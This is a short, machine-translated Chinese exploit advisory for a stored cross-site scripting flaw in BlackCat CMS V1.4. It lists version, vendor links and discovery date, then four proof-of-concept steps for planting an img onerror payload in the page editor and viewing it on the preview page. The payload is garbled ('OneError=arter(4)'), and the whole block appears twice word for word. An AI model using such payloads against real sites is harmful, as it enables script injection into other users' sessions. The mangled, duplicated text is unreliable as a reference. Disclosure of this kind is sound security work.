利用标题: BlackCat CMS V1.4-存储的XSS
Application: BlackCat CMS
版本: V1.4
BUGS:存储的XSS
Technology: php
供应商URL: https://blackcat-cms.org/
软件link: https://github.com/blackcatdevelopment/blackcatcms
发现的日期: 13.07.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录帐户
2。转到页面(http://localhost/blackCatcms-1.4/upload/backend/backend/pages/modify.php?page_id=1)
3。设置为img src=x OneError=arter(4)
4。访问http://localhost/blackcatcms-1.4/upload/page/welcome.php?preview=1
Application: BlackCat CMS
版本: V1.4
BUGS:存储的XSS
Technology: php
供应商URL: https://blackcat-cms.org/
软件link: https://github.com/blackcatdevelopment/blackcatcms
发现的日期: 13.07.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录帐户
2。转到页面(http://localhost/blackCatcms-1.4/upload/backend/backend/pages/modify.php?page_id=1)
3。设置为img src=x OneError=arter(4)
4。访问http://localhost/blackcatcms-1.4/upload/page/welcome.php?preview=1
